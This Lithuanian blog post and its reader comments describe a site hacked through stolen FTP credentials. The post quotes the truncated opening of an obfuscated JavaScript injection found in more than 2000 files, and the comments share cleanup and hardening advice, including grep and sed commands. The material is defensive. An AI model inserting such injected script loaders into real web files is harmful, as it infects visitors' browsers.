Patiko? Prenumeruok el. paštu

Jei pas jus įsilaužė į svetainę

« »

Šiandien užsukęs į savo svetainę pamačiau, kad ji neveikia. Kadangi aš prieš tai tikrai nieko nekenčiau. Prisijungęs prie serverio per FTP pastebėjau, kad įterptas failo gale kodas:

/*GNU GPL*/ try{window.onload = function(){var Xs1ya4t7ajb13i = document.createElement(‘script’);Xs1ya4t7ajb13i.setAttribute(‘type’, ‘text/javascript’);[.. ir t.t. ..] catch(e) {}

Ir toks pakeitimas tikrai ne vienas, pakeista virš 2000 failų. Atakuojami failai (*.js, index.php(phtml|html|htm), main.php(phtml|html|htm). Visą failų sąrašą galima gauti pas adminus.

Gavęs sąrašą failų iš admino matosi, kad buvo panaudotas vos ne visas BOT tinklas, nes prisijungimai buvo daromi daugiau ne 10 (tingiu skaičiuoti) kompiuterių iš skirtingų tinklų.

Ką tokiu atveju daryti?

  • Visų pirma pasikeisti FTP slaptažodžius
  • Žinoma, naikinti kodus (nesmagus užsiėmimas)
  • Pasitikrinti virusus savo kompe (ar ten kur yra jūsų prisijungimai)
  • Ką dar siūlote?

10 responses to “Jei pas jus įsilaužė į svetainę”

  1. Dominykas says:

    Apsigreidinti wordpressą ;)

  2. Ernestas says:

    Aiškintis kaip buvo įsilaužta – jeigu problemos pas save neradai, gali būti, jog įsilaužta per patį serverį ar kitas svetaines serveryje, tada tavo visuotinė pareiga pranešti serverio administratoriams su kuo daugiau informacijos, jog jie patys galėtų tai ištirti. Bet nepranešinėk, jeigu nesi įsitikinęs, kad įsilaužta per tavo sistemą.

    Blokuok bet kokius prisijungimus prie bet ko per ne tavo IP – šitai dažnai apsaugoja ne tik nuo tolimesnio įsilaužėlio naudojimosi sistema, bet ir nuo pačio įsilaužimo.

    Naudok atsargines kopijas, jog galėtum greitai atsistatyti po tokių situacijų.

    Kartą sukompromituotas daugiau nedarai tokį klaidų :) .

  3. Artūras says:

    Buvo tokia pati situacija pas mane, tavciau kodas buvo truputi kitoks, jis atidarydavo puslapi, ą px frame ir jungdavosi i kinietiska serveri. Problema buvo nubruteforce'intas ftp slaptazodis.

    Teko pereiti per daug katalogu, kad panaikinti evil koda is visur, jei turi shell access ir kodas visiskai identiskas tai si komanda pades:

    # ieskoma fraze kataloge, be klaidu pranesimu

    grep -s "ieskoma fraze" *

    # tam tikroje direktorijoje pereina per failus iesko frazes radus, pakeicia

    find /home/bruno/old-friends -type f -exec sed -i 's/SEARCH/REPLACE/g' {} ;

  4. tomas says:

    Kaip jau rašiau Vaidui twiteryje šio kenkėjiško kodo priežasčių reikėtų ieškoti pirmiausia pas save, po to pas visus kitus, kurie turi šio tinklalapio ftp loginus. Tai trojano darbas (trojan.downloader), kuris nuskaito įvairiose ftp programose užsaugotus loginus ir jungiasi jais, tam tikruose failuose palikdamas savo kenkėjišką kodą. Šiandien teko matyt panašų kodą kaip ir čia, kuris kreipiasi pvz į joomla.com.google.com.facebook.com.kazkas.ru (šiuo atveju .newterra.ru), kur slepiasi koks nors botneto CnC ar koks nors exploitas ar dar blogiau (reiktų tik turint noro patyrinėt).

  5. Buvo prisijungta per FTP (tai ne wordpres bugas)

    Klausimas kur pasigavo ;(

  6. aidas says:

    pas mane i parduotuve isilauze.. dabar taisome failus..

  7. Originalas says:

    Dar pasakyk, kad Mac arba iPhone naudoji, kur "nėra virusų". :D

    IMO, tai paprasčiausiai tiesiog Win 7 naudoti, kur kol kas nemačiau panašaus crap, nes update gana uoliai MS leidžia. :)

  8. Dominykas says:

    BTW, labai svarbu nepamiršt pasikeist ne tik FTP, bet ir būtinai būtinai MySQL slaptažodžius, nes jie būna matomi atvirai prisijungus per http://FTP...

    Nors jei kalbėti apie konkretų virusą, tai bent jau ta atmaina, kurios pasekmes man teko tvarkyti vienam draugui, panašu, kad nebando vogti config.php ir panašių failų – tik koreguoja esamus (arba labai gerai pasislėpė FTP loguose).

  9. Vilius says:

    Pas mane irgi tas shhh buvo. Uzknisa ziauriai ziauriai kai valyti reikia. Visa laime ne 2000 failu. Bet irgi apie 20 domenu, tai ilgai valiau. Siaip iseitis nesaugot slaptazodziu, bet kai megstu remote failus redaguoti, tai ziauru budavo slaptazodi pastinti kiekviena karta.

    Be manes irgi yra zmoniu kurie dirba su projektais, tai po to ir neaisku kuris kompas buvo uzkrestas.

    Pas hosterius prasiau, kad padarytu, kad tik is mano IP galima butu prie servo jungtis, bet jie atsisake(serveriai.lt), dabar mastau apie vps pirkima, ten lyg ir galima apriboti, kas per ftp jungiasi.

  10. aphex says:

    Tu toks ne vienintelis :)

Leave a Reply

Your email address will not be published. Required fields are marked *

> home
  • Apie mane
  • Apklausos
  • Blogas
  • Lietblogs Search
  • Nuorodos
  • Reklama mano bloge
  • Search
  • Tags
  • Testas
  • Projektai
  • Kontaktuok
  • Archyvas